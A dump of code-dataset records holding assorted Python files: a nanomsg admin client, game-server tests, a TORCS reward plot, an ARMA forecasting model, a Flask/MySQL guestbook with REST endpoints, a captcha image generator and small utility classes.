json\nfrom microcore import message\n\n\ndef die(error):\n print(error)\n sys.exit(1)\n\n\n@clize\ndef admin(config_pathname, command, *arg):\n\n with open(config_pathname, 'rt') as config_file:\n config = json.loads(config_file.read())\n #print(config)\n\n pub = nnpy.Socket(nnpy.AF_SP, nnpy.PUB)\n pub.connect(config['PubURL'])\n\n sub = nnpy.Socket(nnpy.AF_SP, nnpy.SUB)\n sub.connect(config['SubURL'])\n sub.setsockopt(nnpy.SOL_SOCKET, nnpy.RCVTIMEO, 5000)\n sub.setsockopt(nnpy.SUB, nnpy.SUB_SUBSCRIBE, '')\n\n #time.sleep(1)\n\n reqmsg = None\n if command == 'ping':\n reqmsg = message.Ping()\n elif command == 'info':\n reqmsg = message.InfoReq(arg[0])\n\n if reqmsg is None:\n try:\n pub.close()\n sub.close()\n except:\n pass\n die('unsupported command: %s' % command)\n\n print('>> %s' % reqmsg)\n pub.send(reqmsg.toWire())\n\n received_data = False\n while True:\n try:\n msg = message.decode(sub.recv())\n if str(msg) != str(reqmsg):\n print('<< %s' % msg)\n received_data = True\n except nnpy.errors.NNError:\n if not received_data:\n print('No response')\n break\n except:\n print('Unexpected error: %s' % sys.exc_info()[0])\n break\n pub.close()\n sub.close()\n\n\nif __name__ == '__main__':\n run(admin)\n","sub_path":"nanomsg/node/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"32201668","text":"import unittest\nfrom unittest import mock\nimport sys\nsys.path.insert(1, '../../')\nfrom Remote.server import FishServer, FishClient, is_move, is_posn\n\n\nclass TestServerHelpers(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n unittest.TestCase.__init__(self, *args, **kwargs)\n\n def test_is_posn(self):\n good_posn = [0, 1]\n bad_posn_wrong_len = [1, 2, 3]\n bad_posn_wrong_type = ['a', 'b'] \n\n self.assertTrue(is_posn(good_posn))\n self.assertFalse(is_posn(bad_posn_wrong_len))\n self.assertFalse(is_posn(bad_posn_wrong_type))\n\n def test_is_move(self):\n good_move = [[1, 2], [2, 1]]\n bad_move_wrong_len = [[1, 2]]\n bad_move_wrong_type = [[1, 2], [1]]\n\n self.assertTrue(is_move(good_move))\n self.assertFalse(is_move(bad_move_wrong_len))\n self.assertFalse(is_move(bad_move_wrong_type))\n\n\nclass TestFishClient(unittest.TestCase):\n \n def __init__(self, *args, **kwargs):\n unittest.TestCase.__init__(self, *args, **kwargs)\n self.mock_client = None\n\n def setUp(self):\n mock_socket = mock.Mock()\n self.mock_client = FishClient(mock_socket, (\"localhost\", 12345))\n\n def test_get_player_name(self):\n self.mock_client.client_socket.recv.return_value=\"mike\"\n self.assertEqual(\"mike\", self.mock_client.get_player_name())\n\n self.mock_client.client_socket.recv.return_value=\"#7&!\"\n self.assertTrue(self.mock_client.get_player_name() is None)\n\n def test_end_connection(self):\n self.mock_client.end_connection()\n self.mock_client.client_socket.close.assert_called()\n self.assertTrue(self.mock_client.closed)\n\n\n\nclass TestFishServer(unittest.TestCase):\n pass\n","sub_path":"Fish/Common/Tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"114360411","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfilePath = 'a_speedway_log.csv'\ntrackName = 'a_speedway'\n\ntestData = np.genfromtxt(filePath, delimiter=',', skip_header=1,\n skip_footer=0, names=[\"time\",\"speedX\",\"speedY\",\"speedZ\",\"angle\",\"damage\",\"rpm\",\"trackPos\",\"steering\",\"accel\",\"brake\",\"reward\",\"loss\"])\n\nfig, ax1 = plt.subplots()\nfig.suptitle(trackName)\niterations = np.arange(0, testData.shape[0], 1) \nspeedXsin = -abs(np.multiply(testData[\"speedX\"], np.sin(testData[\"angle\"])))\nspeedXcos = abs(np.multiply(testData[\"speedX\"], np.cos(testData[\"angle\"])))\nspeedXtrackPos = abs(np.multiply(testData[\"speedX\"], testData[\"trackPos\"]))\n\n# Label graph axes \nax1.set_xlabel('Iteration #')\nax1.set_ylabel('Reward Value')\n\n# Plot multiple curves (one per training model) \ntransversal = ax1.plot(iterations, speedXsin, 'b-', label = 'speedX * sin(angle) (Transversal vel.)')\nparallel = ax1.plot(iterations, speedXcos, 'r-', label = '-speedX * cos(angle) (-Parallel vel.)')\nposition = ax1.plot(iterations, speedXtrackPos, 'g-', label = 'speedX * trackPos (Weighted Track Position)')\ntotal = ax1.plot(iterations, testData['reward'], 'b-', label = \"Total Reward\")\n\nplt.legend(bbox_to_anchor=(0., 1.02, 1., .102), loc=3,\n ncol=2, mode=\"expand\", borderaxespad=0.)\nplt.show() \n","sub_path":"torcs-deep-rl/experiments/FCNetA/a_speedway/a_speedwayrewards.py","file_name":"a_speedwayrewards.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"431612681","text":"# =====================================================\n# Title : ARMA Model\n# Author : Sasanka Withanage\n# Last modified Date : 03 May 2020\n# =====================================================\n\nimport sys\nimport numpy\nfrom typing import List, Any\nfrom Models.Components import DataRetriever\nfrom statsmodels.tsa.arima_model import ARMA\nfrom sklearn.metrics import mean_squared_error\nfrom Models.Components import AccuracyCalculator\nfrom Models.Components import CustomLogger as logger\n\nperiodOfTime, model = \"\", \"\"\n\n\n# -------------------------------------------------------------------------\n# This method can provide accuracy percentages and forecast values.\n# -------------------------------------------------------------------------\ndef predict(predictionName, datasetType, modelType=1, defaultRatio=True, sizeOfTrainingDataSet=7, getAccuracy=True,\n logOnTelegram=True, ratio=0.2):\n global periodOfTime, model\n try:\n # Printing request of user.\n if getAccuracy:\n logger.log(logOnTelegram, \"Client requested for \" + predictionName + \" accuracy\")\n else:\n logger.log(logOnTelegram, \"Client requested for \" + predictionName + \" forecast\")\n\n # Import relevant file from the server.\n series = DataRetriever.getFileData(datasetType)\n logger.log(logOnTelegram, \"Dataset retrieved successfully\")\n\n # Set splitting point of the dataset.\n logger.log(logOnTelegram, \"Finding splitting point\")\n if defaultRatio:\n split_point = int(len(series) - (len(series) * ratio))\n elif not getAccuracy:\n split_point = int(len(series))\n else:\n split_point = len(series) - sizeOfTrainingDataSet\n\n # Splitting data set according to the splitting point.\n trainingDataSet, validationDataSet = series[0:split_point], series[split_point:]\n logger.log(logOnTelegram, \"Data splitting successful\")\n\n # Set length into variables.\n trainingDataSetSize = len(trainingDataSet)\n testingDataSetSize = len(validationDataSet)\n\n trainingDataSetSizeString = 'Training Data Set Size : ' + str(trainingDataSetSize)\n testingDataSetSizeString = 'Testing Data Set Size : ' + str(testingDataSetSize)\n\n logger.log(logOnTelegram, trainingDataSetSizeString)\n logger.log(logOnTelegram, testingDataSetSizeString)\n\n # If user required for forecast, testing data size will set to future requirement.\n if not getAccuracy:\n testingDataSetSize = sizeOfTrainingDataSet\n logger.log(logOnTelegram,\n \"Testing data set is updated with new value. New value is \" + str(testingDataSetSize))\n\n # There is a difference in weather changing.\n # To find out that properly we are going to take seasonal difference.\n # That is, we can take the observation for a day and subtract the observation from the same day one year ago.\n # Remove seasonal difference.\n def findSeasonalDifference(dataset, interval=1):\n logger.log(logOnTelegram, \"Requested for seasonal difference\")\n\n # Initialize list as difference.\n listOfDifference = list()\n\n # Iterate through whole array.\n for datasetIndex in range(interval, len(dataset)):\n value = dataset[datasetIndex] - dataset[datasetIndex - interval]\n listOfDifference.append(value)\n\n # return difference array.\n return numpy.array(listOfDifference)\n\n # Invert difference values.\n # Only for data which changed and wanted to make it back as previous.\n def invertSeasonalDifference(lastIndexValue, differenceValue, interval=1):\n return differenceValue + lastIndexValue[-interval]\n\n # Retrieve values from training dataset.\n trainingDatasetValues = trainingDataSet.values\n\n # Train proper model according to user requirement.\n if modelType == 1:\n periodOfTime = 365\n seasonalDifferenceArray = findSeasonalDifference(trainingDatasetValues, periodOfTime)\n\n # Suitable seasonal order for the rainfall and temperature.\n model = ARMA(seasonalDifferenceArray, order=(7, 0))\n\n logger.log(logOnTelegram, \"ARMA model set. Order of arma model is 7,0 and period is 365\")\n\n elif modelType == 2:\n periodOfTime = 48\n seasonalDifferenceArray = findSeasonalDifference(trainingDatasetValues, periodOfTime)\n\n # Suitable seasonal order for the plant price prediction.\n model = ARMA(seasonalDifferenceArray, order=(2, 0))\n\n logger.log(logOnTelegram,\n \"ARIMA model set. Order of arima model is 2,0 and period is 48. Weekly data sets\")\n\n # Training model.\n logger.log(logOnTelegram, \"Training model\")\n fittedModel = model.fit(disp=0)\n logger.log(logOnTelegram, \"Model fitted\")\n\n # Log summery details.\n logger.log(logOnTelegram, fittedModel.summary())\n\n # Future forecast value.\n forecast = fittedModel.forecast(steps=testingDataSetSize)[0]\n logger.log(logOnTelegram, \"Future values forecasted\")\n\n # Reshape history array.\n history = [x for x in trainingDatasetValues]\n\n forecastResult: List[Any] = []\n for singleForecastedElement in forecast:\n # Invert each value from forecasted values.\n inverted = invertSeasonalDifference(history, singleForecastedElement, periodOfTime)\n\n # Append to forecasted result.\n forecastResult.append(inverted)\n\n # Append values to history.\n history.append(inverted)\n\n logger.log(logOnTelegram, \"Multi step forecasted\")\n\n # Get values from the validation data.\n validationData = validationDataSet.values\n\n # Check for the user requirement whether accuracy or forecast details.\n if getAccuracy:\n\n # If rain fall return mean squared error.\n if datasetType == \"precipitation\":\n # Calculate mean squared error value.\n meanSquaredError = mean_squared_error(validationData, forecastResult, squared=False)\n\n # Log and return accuracy.\n logger.log(logOnTelegram, \"Mean squared error is \" + str(meanSquaredError))\n return str(meanSquaredError)\n else:\n # Calculate accuracy with predicted and testing data.\n accuracy = AccuracyCalculator.calculate(validationData, forecastResult)\n\n # Log and return accuracy.\n logger.log(logOnTelegram, \"Accuracy Percentage : \" + str(accuracy))\n return str(accuracy)\n else:\n # Return json array after calculation.\n jsonArray = AccuracyCalculator.jsonConverter(forecastResult)\n logger.log(logOnTelegram, \"JSON Array is : \" + str(jsonArray))\n return str(jsonArray)\n\n except Exception:\n # Display proper error message with error and error line.\n exc_type, exc_obj, exc_tb = sys.exc_info()\n exceptionDetails = str(exc_type) + \" error occurred in '\" + str(\n exc_tb.tb_frame.f_code.co_filename) + \"' Line : \" + str(exc_tb.tb_lineno)\n logger.log(logOnTelegram, exceptionDetails, \"ERROR\")\n return \"Error occurred in the source code\"\n\n# Model Training callers with out Api\n\n# --------------------------------------------------- Accuracy ---------------------------------------------------\n# predict(\"Temperature\", \"temp\")\n# predict(\"Precipitation\", \"precipitation\")\n# predict(\"AshPlantain-ARMA\", \"AshPlantain\", 2)\n# predict(\"Brinjal-ARMA\", \"Brinjal\", 2)\n# predict(\"Cucumber-ARMA\", \"Cucumber\", 2)\n# predict(\"LadiesFinger-ARMA\", \"LadiesFinger\", 2)\n# predict(\"RedPumpkin-ARMA\", \"RedPumpkin\", 2)\n\n# ------------------------------------------------- Forecasting -------------------------------------------------\n# predict(\"Temperature\", \"temp\", defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=90)\n# predict(\"Precipitation\", \"precipitation\", defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=90)\n# predict(\"ARMA_AshPlantain\", \"AshPlantain\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# predict(\"ARMA_Brinjal\", \"Brinjal\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# predict(\"ARMA_Cucumber\", \"Cucumber\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# predict(\"ARMA_LadiesFinger\", \"LadiesFinger\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n# predict(\"ARMA_RedPumpkin\", \"RedPumpkin\", 2, defaultRatio=False, getAccuracy=False, sizeOfTrainingDataSet=16)\n","sub_path":"Data-Science/Prediction/Models/ARMA/ARMA.py","file_name":"ARMA.py","file_ext":"py","file_size_in_byte":8785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"470291117","text":"from flask import Flask, render_template, request, redirect, url_for\nimport mysql.connector\n# from flask_sqlalchemy import SQLAlchemy\n# import pymysql\n# pymysql.install_as_MySQLdb()\napp=Flask(__name__)\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:111@127.0.0.1:3306/flask_raw_sql'\n# app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n# db = SQLAlchemy(app)\n# class Comments(db.Model):\n# \tid = db.Column(db.Integer, primary_key=True)\n# \tname = db.Column(db.String(20))\n# \tcomment = db.Column(db.String(1000))\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"111\",\n database=\"flask_raw_sql\"\n )\nmymsg='welcome'\n@app.route('/')\ndef index():\n #result = Comments.query.all()\n #result = db.engine.execute(' SELECT * FROM comments')\n mycursor = mydb.cursor()\n mycursor.execute(\"SELECT * FROM comments\")\n myresult = mycursor.fetchall()\n return render_template('index.html',result=myresult,msg=mymsg)\n@app.route('/sign')\ndef sign():\n return render_template('sign.html')\n@app.route('/process',methods=['POST'])\ndef process():\n #signature=Comments(name=name,comment=comment)\n #signature=db.engine.execute(' INSERT INTO comments (name, comment) VALUES (%s,%s);',(name,comment)) #.execution_options(autocommit=True))\n #db.session.add(signature)\n #db.session.commit()\n name=request.form['name']\n comment=request.form['comment']\n sql = \"INSERT INTO comments (name, comment) VALUES (%s, %s)\"\n val = (name,comment)\n mycursor = mydb.cursor()\n mycursor.execute(sql,val)\n mydb.commit()\n global mymsg\n mymsg='successful'\n return redirect(url_for('index'))\n@app.route('/delete/',methods=['POST'])\ndef delete(id):\n sql=\"delete from comments where id = %s\"\n data=(id,)\n mycursor=mydb.cursor()\n mycursor.execute(sql,data)\n mydb.commit()\n global mymsg\n mymsg='deleted'\n return redirect('/')\n@app.route('/update/',methods=['POST'])\ndef update(id):\n sql = \"SELECT * FROM comments WHERE id = %s\"\n adr = (id, )\n mycursor=mydb.cursor()\n mycursor.execute(sql,adr)\n myresult = mycursor.fetchall()\n return render_template('update.html',data=myresult)\n@app.route('/update_data',methods=['POST'])\ndef update_data():\n id=request.form['id_data']\n name=request.form['name']\n comment=request.form['comment']\n mycursor=mydb.cursor()\n sql=\"update comments set name = %s , comment = %s where id = %s\"\n data=(name,comment,id,)\n mycursor.execute(sql,data)\n mydb.commit()\n global mymsg\n mymsg='updated'\n return redirect('/')\nif __name__== '__main__':\n app.run(debug=True)","sub_path":"gaustbook.py","file_name":"gaustbook.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"174590302","text":"def insertionSort(arr):\n n = len(arr)\n for i in range(n):\n temp = arr[i]\n idx = i-1\n while idx>=0 and arr[idx]>temp:\n arr[idx+1] = arr[idx]\n idx-=1\n arr[idx+1] = temp\n\n\nn = int(input())\narr = list(map(int, input().split()))\ninsertionSort(arr)\nfor i in range(len(arr)):\n print(arr[i],end=\" \")\n","sub_path":"insertionSort.py","file_name":"insertionSort.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324439471","text":"\n\n#calss header\nclass _BUNKER():\n\tdef __init__(self,): \n\t\tself.name = \"BUNKER\"\n\t\tself.definitions = [u'a shelter, usually underground, that has strong walls to protect the people inside it from bullets or bombs', u'in golf, a hollow area of ground filled with sand, that is difficult to hit a ball out of']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_bunker.py","file_name":"_bunker.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"410062837","text":"import random\r\nimport os\r\nfrom PIL import ImageFont, Image, ImageDraw, ImageFilter\r\n\r\n\r\ndef auth_code():\r\n size = (185, 60) # 图片大小\r\n font_list = list(\"0123456789abcdefghijklmnopqrstuvwxyz\") # 验证码范围\r\n c_chars = \" \".join(random.sample(font_list, 4)) # 4个+中间加个俩空格\r\n print(c_chars)\r\n img = Image.new(\"RGB\", size, (33, 33, 34)) # RGB颜色\r\n draw = ImageDraw.Draw(img) # draw一个\r\n #font = ImageFont.truetype(\"arial.ttf\", 23) # 字体\r\n font = ImageFont.truetype(\"arial.ttf\", 30) # 字体\r\n draw.text((5, 4), \" \"+c_chars, font=font, fill=\"white\") # 字颜色\r\n params = [1 - float(random.randint(1, 2)) / 100,\r\n 0,\r\n 0,\r\n 0,\r\n 1 - float(random.randint(1, 10)) / 100,\r\n float(random.randint(1, 2)) / 500,\r\n 0.001,\r\n 0.002]\r\n img = img.transform(size, Image.PERSPECTIVE, params)\r\n img = img.filter(ImageFilter.EDGE_ENHANCE_MORE)\r\n img.save(f'./test_img/{c_chars}.png')\r\n\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists('./test_img'):\r\n os.mkdir('./test_img')\r\n while True:\r\n auth_code()\r\n if len(os.listdir('./test_img')) >= 3000:\r\n break\r\n","sub_path":"yanzhengma_bk/Demo/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291976813","text":"import pygame\nimport math\n\nfrom models.items.item_types import ItemType\n\n\nclass HungerBar:\n txt_surface = None\n\n def __init__(self, player):\n self.hunger = 1000\n self.font = pygame.font.SysFont(\"Arial\", 30, True)\n self.font_small = pygame.font.SysFont(\"Arial\", 12, True)\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (0, 255, 0))\n self.txt_2 = self.font_small.render(\"You're getting hungry, press 'E' to eat 1 wheat.\", True, (255, 255, 255))\n self.txt_3 = self.font_small.render(\"You're getting hungry, try to find something to eat\", True, (255, 255, 255))\n self.player = player\n self.heal_step = 0\n\n def step(self):\n self.heal_step += 1\n if self.heal_step == 100:\n self.heal_step = 0\n\n self.hunger -= 0.1\n if self.hunger > 500:\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (0, 255, 0))\n if self.heal_step == 0:\n self.player.health_bar.take_damage(-1)\n elif self.hunger > 250:\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (255, 255, 102))\n else:\n self.txt_surface = self.font.render(\"Hunger: \" + str(int(self.hunger)), True, (255, 0, 0))\n\n if self.hunger < 0:\n self.hunger = 0\n self.player.health_bar.take_damage(1)\n\n def draw(self, surface):\n surface.blit(self.txt_surface, (10, 660))\n if self.hunger < 500:\n if self.player.inventory.inventory[ItemType.WHEAT].amount > 0:\n surface.blit(self.txt_2, (10, 700))\n else:\n surface.blit(self.txt_3, (10, 700))\n\n def eat(self):\n self.hunger += 100\n self.hunger = min(1000, self.hunger)\n","sub_path":"models/hungerbar.py","file_name":"hungerbar.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"597984915","text":"\n\nfrom xai.brain.wordbase.nouns._anthill import _ANTHILL\n\n#calss header\nclass _ANTHILLS(_ANTHILL, ):\n\tdef __init__(self,): \n\t\t_ANTHILL.__init__(self)\n\t\tself.name = \"ANTHILLS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"anthill\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_anthills.py","file_name":"_anthills.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"649652115","text":"'''\nimport sys\nimport time\n\nfor i in range(30):\n sys.stdout.write(\"#\")\n sys.stdout.flush()\n time.sleep(0.1)\n\nf = open(\"yestday\", 'r+', encoding=\"utf-8\") # r+在文件末尾追加\n# f = open(\"yestday\", 'w+', encoding=\"utf-8\") # w+ 写读,在文件末尾添加,如果不存在,则创建,覆盖写入\n# f = open(\"yestday\", 'a+', encoding=\"utf-8\") # a+ 追加写+读,在文件末尾追加\n\n# f = open(\"yestday\", 'wb')\n# print(f.readline())\n\n# f.write(\"wo ai beijing ti an an men\".encode())\n# print(f.tell()) # 按字符计数\n\n# f.close()\n\n# f = open(\"yestday\", 'rb')\n# print(f.readline())\nprint(f.truncate(20))\n\nprint(f.readline()) # 按行读取\nprint(f.readlines()) # 一次读取整个文件,如果文件过大,请不要使用\"readlines\"读取文件\n\nf.flush() # 刷新缓存\nprint(f.seek(0)) # 移动文件指针位置\n\nprint(f.readline(5)) # 打印一行中的前5个字符\n\nf.close()\n'''\n# 修改文件内容\nf = open('yestday', 'r', encoding=\"utf-8\")\nf_new = open('yesday.bak', 'w', encoding=\"utf-8\")\n\nfor line in f:\n if '我' in line:\n line = line.replace('我', 'alber')\n f_new.write(line)\nf.close()\nf_new.close()\n\n\n\n\n\n\n\n\n\n\n\n\n# f = open(\"yestday\", 'r', encoding='utf-8')\n# data = f.read()\n# 读取文件前5行\n'''\nprint(f.readline())\nprint(f.readline())\nprint(f.readline())\nprint(f.readline())\nprint(f.readline())\n\nfor i in range(5):\n print(f.readline())\nfor line in f.readlines():\n print(line.strip())\n'''\n\n# 第10行不打印\n'''\nf = open(\"yestday\", 'r', encoding='utf-8')\nfor index, line in enumerate(f.readlines()):\n if index == 9:\n print(\"---我是分割符------------------------------------\")\n continue\n print(line.strip())\n\nf.close()\n\n\n# 高比格\nf = open(\"yestday\", 'r', encoding='utf-8')\ncount = 0\nfor line in f:\n count += 1\n if count == 9:\n print(\"---我是分割符------------------------------------\")\n print(line.strip())\n\n'''\n\n\n\n\n","sub_path":"day2/file_op.py","file_name":"file_op.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"239645498","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nfrom DimensionListCtrl import DimensionListCtrl\nfrom RoleEnvironmentProperties import RoleEnvironmentProperties\nfrom DimensionCostListCtrl import DimensionCostListCtrl\n\n\nclass RoleEnvironmentPanel(wx.Panel):\n def __init__(self,parent,dp):\n wx.Panel.__init__(self,parent,armid.ROLE_PANELENVIRONMENT_ID)\n self.dbProxy = dp\n self.theEnvironmentDictionary = {}\n self.theSelectedIdx = -1\n\n mainSizer = wx.BoxSizer(wx.HORIZONTAL)\n environmentBox = wx.StaticBox(self)\n environmentListSizer = wx.StaticBoxSizer(environmentBox,wx.HORIZONTAL)\n mainSizer.Add(environmentListSizer,0,wx.EXPAND)\n self.environmentList = DimensionListCtrl(self,armid.ROLE_LISTENVIRONMENTS_ID,wx.DefaultSize,'Environment','environment',self.dbProxy,listStyle=wx.LC_REPORT | wx.LC_SINGLE_SEL)\n environmentListSizer.Add(self.environmentList,1,wx.EXPAND)\n\n environmentDimSizer = wx.BoxSizer(wx.VERTICAL)\n mainSizer.Add(environmentDimSizer,1,wx.EXPAND)\n\n rSizer = wx.BoxSizer(wx.HORIZONTAL)\n environmentDimSizer.Add(rSizer,1,wx.EXPAND)\n self.responseList = DimensionCostListCtrl(self,armid.ROLE_LISTRESPONSES_ID,'Response')\n responseBox = wx.StaticBox(self)\n responseSizer = wx.StaticBoxSizer(responseBox,wx.HORIZONTAL)\n responseSizer.Add(self.responseList,1,wx.EXPAND)\n rSizer.Add(responseSizer,1,wx.EXPAND)\n\n cSizer = wx.BoxSizer(wx.HORIZONTAL)\n environmentDimSizer.Add(cSizer,1,wx.EXPAND)\n self.cmList = DimensionListCtrl(self,armid.ROLE_LISTCOUNTERMEASURES_ID,wx.DefaultSize,'Countermeasure','countermeasure',self.dbProxy,listStyle = wx.LC_REPORT | wx.LC_SINGLE_SEL)\n cmBox = wx.StaticBox(self)\n cmSizer = wx.StaticBoxSizer(cmBox,wx.HORIZONTAL)\n cmSizer.Add(self.cmList,1,wx.EXPAND)\n cSizer.Add(cmSizer,1,wx.EXPAND)\n\n self.SetSizer(mainSizer)\n self.environmentList.Unbind(wx.EVT_RIGHT_DOWN)\n self.responseList.Unbind(wx.EVT_RIGHT_DOWN)\n self.cmList.Unbind(wx.EVT_RIGHT_DOWN)\n \n def loadControls(self,role):\n self.environmentList.Unbind(wx.EVT_LIST_ITEM_SELECTED)\n self.environmentList.Unbind(wx.EVT_LIST_ITEM_DESELECTED)\n\n# We load the environment name control before anything else. Weird stuff happens if we don't do this. Don't ask me why!!!\n environmentNames = []\n for cp in role.environmentProperties():\n environmentNames.append(cp.name())\n self.environmentList.load(environmentNames)\n\n for cp in role.environmentProperties():\n environmentName = cp.name()\n self.theEnvironmentDictionary[environmentName] = cp\n\n if (len(environmentNames) > 0):\n environmentName = environmentNames[0]\n p = self.theEnvironmentDictionary[environmentName]\n self.responseList.load(p.responses()) \n self.cmList.load(p.countermeasures()) \n self.environmentList.Select(0)\n self.environmentList.Bind(wx.EVT_LIST_ITEM_SELECTED,self.OnEnvironmentSelected)\n self.environmentList.Bind(wx.EVT_LIST_ITEM_DESELECTED,self.OnEnvironmentDeselected)\n self.theSelectedIdx = 0\n\n def OnEnvironmentSelected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n environmentName = self.environmentList.GetItemText(self.theSelectedIdx)\n p = self.theEnvironmentDictionary[environmentName]\n self.responseList.load(p.responses()) \n self.cmList.load(p.countermeasures())\n \n def OnEnvironmentDeselected(self,evt):\n self.responseList.DeleteAllItems() \n self.cmList.DeleteAllItems() \n self.theSelectedIdx = -1\n","sub_path":"cairis/cairis/RoleEnvironmentPanel.py","file_name":"RoleEnvironmentPanel.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"7079486","text":"from flask import Flask, url_for\nfrom flask import render_template, request, redirect\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_marshmallow import Marshmallow\nfrom sqlalchemy import desc, asc\nfrom flask_restful import Api, Resource\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////tmp/test.db'\ndb = SQLAlchemy(app)\nma = Marshmallow(app)\napi = Api(app)\n\n# Database table creation\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), unique=True, nullable=False)\n age = db.Column(db.Integer, nullable=False)\n points = db.Column(db.Integer, default=0, nullable=False)\n address = db.Column(db.String(120), nullable=False)\n \n def __repr__(self):\n return '' % self.name\n\n\nclass UserSchema(ma.Schema):\n class Meta:\n fields = (\"name\", \"age\", \"points\", \"address\")\n model = User\n\nuser_schema = UserSchema()\nusers_schema = UserSchema(many=True)\n\n\n@app.route('/')\ndef index():\n rows = User.query.order_by(desc(User.points),asc(User.name))\n return render_template('index.html',\n title='Leaderboard',\n rows=rows)\n\n@app.route('/adduser', methods=['POST'])\ndef add_user():\n new_user = User(\n name=request.form['name'].lower(),\n age=request.form['age'],\n address=request.form['address']\n )\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/plus', methods=['POST'])\ndef plus():\n user = User.query.filter_by(id=request.form[\"plus\"]).first_or_404()\n user.points += 1\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/minus', methods=['POST'])\ndef minus():\n user = User.query.filter_by(id=request.form[\"minus\"]).first_or_404()\n if user.points > 0:\n user.points -= 1\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/delete', methods=['POST'])\ndef delete():\n user = User.query.filter_by(id=request.form[\"delete\"]).first_or_404()\n db.session.delete(user)\n db.session.commit()\n return redirect(url_for('index'))\n\n@app.route('/add', methods=['POST'])\ndef add():\n return render_template(\"user.html\")\n\n\n\n#REST API methods\nclass UserListResource(Resource):\n def get(self):\n users = User.query.all()\n return users_schema.dump(users)\n\n def post(self):\n new_user = User(\n name=request.json['name'].lower(),\n age=request.json['age'],\n # points=request.json['points'],\n address=request.json['address']\n )\n db.session.add(new_user)\n db.session.commit()\n return user_schema.dump(new_user)\nclass UserResource(Resource):\n def get(self, user_id):\n user = User.query.get_or_404(user_id)\n return user_schema.dump(user)\n\n def delete(self, user_id):\n user = User.query.get_or_404(user_id)\n db.session.delete(user)\n db.session.commit()\n return '', 204\n\napi.add_resource(UserResource, '/users/') \napi.add_resource(UserListResource, '/users') \n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"305391584","text":"'''\nFile: main.py\n@author: Cheng-Hsuan Tsai\n'''\nimport sys\nimport argparse\n\ndef parse_stdin_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", help=\"Result File\", required=True)\n args = parser.parse_args()\n return args\n\ndef parser(filename):\n data = []\n lineNum = 0\n try:\n tempFile = 